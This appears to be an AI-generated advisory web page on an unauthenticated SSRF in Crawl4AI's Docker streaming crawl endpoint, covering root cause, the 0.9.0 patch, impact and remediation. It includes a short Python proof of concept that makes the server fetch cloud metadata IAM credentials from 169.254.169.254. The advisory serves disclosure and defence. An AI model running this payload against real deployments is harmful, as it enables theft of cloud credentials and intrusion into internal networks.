CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-WM69-2PC3-RMMF

GHSA-wm69-2pc3-rmmf: Unauthenticated Server-Side Request Forgery in Crawl4AI Docker Streaming Crawl Path

Amit Schendel
Amit Schendel
Senior Security Researcher

Jun 18, 2026·5 min read·2 visits

Executive Summary (TL;DR)

A bypass of SSRF validation on the streaming crawl endpoints in Crawl4AI Docker deployments allows unauthenticated remote attackers to query internal network services and cloud metadata endpoints.

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability was identified in the Crawl4AI Docker API server before version 0.9.0. The vulnerability exists because the streaming crawl endpoint (/crawl/stream) and the standard crawl endpoint with streaming enabled (/crawl with crawler_config.stream=true) bypass the validate_url_destination security filter. This allows remote, unauthenticated attackers to execute arbitrary HTTP requests targeting internal infrastructure, loopback interfaces, or cloud metadata endpoints like AWS/GCP services.

Vulnerability Overview

Crawl4AI is an open-source, LLM-friendly web crawler and scraper designed to convert web pages into structured text formats. To facilitate multi-user deployments, the project provides a containerized FastAPI application. The Docker server exposes endpoints that accept scraping requests, allowing remote consumers to execute crawl tasks on target URLs.

The attack surface of the Crawl4AI Docker container is unauthenticated by default. This public exposure necessitates strict validation controls to prevent attackers from using the crawler as a proxy. If a user-supplied target URL is not constrained, the backend crawler can be abused to perform network queries targeting unauthorized locations.

This security posture is compromised when handling streaming crawl operations. Specifically, the POST /crawl/stream endpoint and streaming-configured calls to POST /crawl bypass the internal validation engine. This bypass results in an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. The flaw allows remote attackers to probe internal networks and cloud infrastructure.

Root Cause Analysis

The root cause of the vulnerability lies in the structural discrepancy between the streaming and non-streaming request handlers inside the deploy/docker/api.py router. While standard crawler operations route through an input normalization routine that calls validate_url_destination(), the streaming engine does not.

In the vulnerable implementation of deploy/docker/api.py, requests sent directly to /crawl/stream maps to handle_stream_crawl_request(). Similarly, requests sent to /crawl with crawler_config.stream=true are diverted straight to the same streaming handler. The design of handle_stream_crawl_request() processed the raw seed URLs directly, bypassing validation.

This validation gap persisted due to regression testing shortcomings. The existing test suite verified the generic existence of SSRF filtering in some handlers but did not validate coverage across every independent path. Consequently, the streaming controller remained completely exposed to malicious user inputs.

Code Analysis

To illustrate the structural omission, we compare the original logic with the patch implemented in version 0.9.0. In the patched state, the development team introduced _normalize_and_validate_seeds() to centralize input filtering and prevent code execution drift across multiple API handlers.

Below is the unified validation wrapper introduced in the patched code. This function ensures that every URL is normalized and subjected to validate_url_destination() before any networking context is initialized:

# Introduced in v0.9.0 inside deploy/docker/api.py
def _normalize_and_validate_seeds(urls: List[str]) -> List[str]:
    """Prefix bare hosts with https:// and SSRF-validate every seed URL's
    destination. Shared by the streaming and non-streaming crawl handlers."""
    urls = [('https://' + url) if not url.startswith(('http://', 'https://')) and not url.startswith(('raw:', 'raw://')) else url for url in urls]
    for url in urls:
        validate_url_destination(url)
    return urls

In the patched version of handle_stream_crawl_request(), the validation is called immediately upon receiving the parameter inputs. This enforces the exact security boundary already established in the standard crawl endpoint:

async def handle_stream_crawl_request(
    urls: List[str],
    browser_config: dict,
    crawler_config: dict,
    config: dict,
    hooks_config: Optional[dict] = None
) -> Tuple[AsyncWebCrawler, AsyncGenerator, Optional[Dict]]:
    """Handle streaming crawl requests with optional hooks."""
    hooks_info = None
    crawler = None
    try:
        # Enforce SSRF validation for streaming sessions
        urls = _normalize_and_validate_seeds(urls)
        # Remaining streaming process continues safely...

Crucially, the SSRF engine (deploy/docker/utils.py) defines blocklists for common internal network ranges. This includes IPv4 private blocks (RFC 1918), local link-local segments (169.254.0.0/16), and standard internal hostnames such as metadata.google.internal and kubernetes.default. Applying _normalize_and_validate_seeds stops the attack because the egress broker resolves DNS queries and rejects blocked IP configurations.

Exploitation & Attack Flow

Exploitation requires no authentication or special application states. An attacker can execute the attack by sending a JSON payload directly to the /crawl/stream endpoint on an exposed server. This makes the target host fetch and return restricted local resources.

The attack flow is illustrated in the diagram below, showing how the bypass circumvents validation to access internal assets:

Below is a practical Python proof-of-concept script illustrating the exploitation technique against an unprotected target. The script triggers the streaming endpoint to crawl the cloud instance metadata service:

import requests
 
target_url = 'http://target-crawl4ai-server:11235/crawl/stream'
payload = {
    'urls': ['http://169.254.169.254/latest/meta-data/iam/security-credentials/'],
    'browser_config': {},
    'crawler_config': {}
}
 
response = requests.post(target_url, json=payload, stream=True)
for line in response.iter_lines():
    if line:
        print(line.decode('utf-8'))

Impact Assessment

The security impact of this vulnerability is classified as High (CVSS 8.6). Because the server acts as an open proxy to access internal domains, the attack scope is changed (S:C). This allows the attacker to cross security boundaries and read data from isolated environments.

A successful exploit compromises confidentiality on a systemic level (C:H). In cloud environments (such as AWS, GCP, or Azure), the metadata server exposes temporary IAM credentials, service tokens, and instance metadata. Attackers can leverage these credentials to compromise broader cloud infrastructure.

Furthermore, attackers can use the unauthenticated container as an internal port scanner. By parsing the response times and HTTP responses from streaming requests, attackers can map out the internal topology. This identifies adjacent microservices, databases, and configuration consoles that are not exposed to the public internet.

Remediation & Mitigation

Remediation requires upgrading the crawl4ai installation to version 0.9.0 or higher. This version integrates the _normalize_and_validate_seeds() wrapper across all streaming handlers. This blocks the bypass path permanently.

If upgrading is delayed, organizations should restrict container egress traffic. Implement network policies using egress firewalls to prevent the Docker container from initiating outbound connections to RFC 1918 networks (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and the link-local range (169.254.0.0/16).

Additionally, avoid exposing the Crawl4AI Docker server directly to the public internet without an authentication layer. Placing the container behind a reverse proxy, API gateway, or VPN that enforces token-based authorization mitigates the risk of direct exposure.

Technical Appendix

CVSS Score
8.6/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Affected Systems

Crawl4AI Docker API Server

Affected Versions Detail

Product
Affected Versions
Fixed Version
crawl4ai
Unclecode
< 0.9.00.9.0
AttributeDetail
CWE IDCWE-918
Attack VectorNetwork (AV:N)
Attack ComplexityLow (AC:L)
Privileges RequiredNone (PR:N)
CVSS Score8.6 (High)
Exploit StatusProof-of-Concept (PoC)
CISA KEV StatusNot Listed

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1552.005Unsecured Credentials: Cloud Metadata Service
Credential Access
T1046Network Service Discovery
Discovery
T1090Proxy
Command and Control
CWE-918
Server-Side Request Forgery (SSRF)

The web application server-side engine receives an untrusted URL, resolves it, and fetches resource without verifying whether the host is within a restricted network boundary.

Known Exploits & Detection

GitHub AdvisoryVulnerability report highlighting the SSRF validation gap in handle_stream_crawl_request.

Vulnerability Timeline

Security advisory GHSA-wm69-2pc3-rmmf published.
2026-06-18
Crawl4AI version 0.9.0 published containing official SSRF verification fix.
2026-06-18

References & Sources

  • [1]GitHub Security Advisory GHSA-wm69-2pc3-rmmf
  • [2]Crawl4AI Github Repository
  • [3]Crawl4AI API Entry point source code
  • [4]Crawl4AI Docker validation utilities

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•4 minutes ago•GHSA-2JQ4-Q6VV-4CP3
9.6

GHSA-2JQ4-Q6VV-4CP3: Arbitrary File Write via Path Traversal in Crawl4AI Downloads

A critical Arbitrary File Write vulnerability exists in Crawl4AI versions 0.8.9 and below. By manipulating download filenames via Content-Disposition headers or suggested_filename values, attackers can write arbitrary files to any location on the file system, potentially leading to Remote Code Execution.

Amit Schendel
Amit Schendel
0 views•5 min read
•30 minutes ago•GHSA-R253-R9JW-QG44
10.0

GHSA-R253-R9JW-QG44: Unauthenticated Remote Code Execution in Crawl4AI via Chromium Launch-Argument Injection

A critical unauthenticated remote code execution vulnerability exists in Crawl4AI versions up to 0.8.9. The flaw is caused by improper neutralization of command arguments passed to the Chromium process execution engine via the browser_config.extra_args parameter, enabling remote attackers to execute arbitrary shell commands inside the container.

Alon Barad
Alon Barad
0 views•6 min read
•about 2 hours ago•CVE-2026-12565
5.3

CVE-2026-12565: Arbitrary File Write via Path Traversal in BBOT unarchive Module

CVE-2026-12565 is a medium-severity path traversal (Zip-Slip) vulnerability within the internal unarchive module of the BBOT (Black Lantern Security) OSINT framework. The vulnerability exists due to a failure to validate target paths before extracting archives using host-level command-line utilities. This allows remote, unauthenticated attackers to write arbitrary files outside of the target extraction folder on environments running legacy versions of GNU tar.

Alon Barad
Alon Barad
2 views•7 min read
•about 3 hours ago•CVE-2026-12566
3.1

CVE-2026-12566: Server-Side Request Forgery (SSRF) in Black Lantern Security BBOT docker_pull Module

A Server-Side Request Forgery (SSRF) vulnerability exists in the docker_pull module of Black Lantern Security BBOT. By returning a maliciously crafted WWW-Authenticate header from a rogue Docker registry or executing a Man-in-the-Middle (MitM) attack, an attacker can coerce the BBOT scanner into making arbitrary HTTP requests to internal system services or external infrastructure, potentially disclosing sensitive authorization tokens and host metadata.

Amit Schendel
Amit Schendel
3 views•6 min read
•about 3 hours ago•CVE-2026-12568
6.5

CVE-2026-12568: Path Traversal and Arbitrary File Write in BBOT postman_download Module

CVE-2026-12568 is a path traversal vulnerability (CWE-22) in the postman_download module of BBOT (Babbage Border Obsession Tool) version 2.1.0 through 2.8.5. The vulnerability allows an attacker to perform arbitrary file writes on the local machine running the BBOT scan via a maliciously named remote Postman workspace.

Alon Barad
Alon Barad
3 views•7 min read
•about 4 hours ago•CVE-2026-12567
2.2

CVE-2026-12567: Symlink Following Vulnerability in BBOT github_workflows Module

The github_workflows module in BBOT (Black Lantern Security OSINT framework) versions 2.0.0 through 2.8.4 constructs local directory paths from user-controlled repository and owner names without validating for symbolic links. A local attacker sharing the scan directory can pre-plant a symlink at the predictable output path, forcing BBOT to write downloaded workflow artifacts or run logs to an arbitrary location on the filesystem.

Amit Schendel
Amit Schendel
6 views•6 min read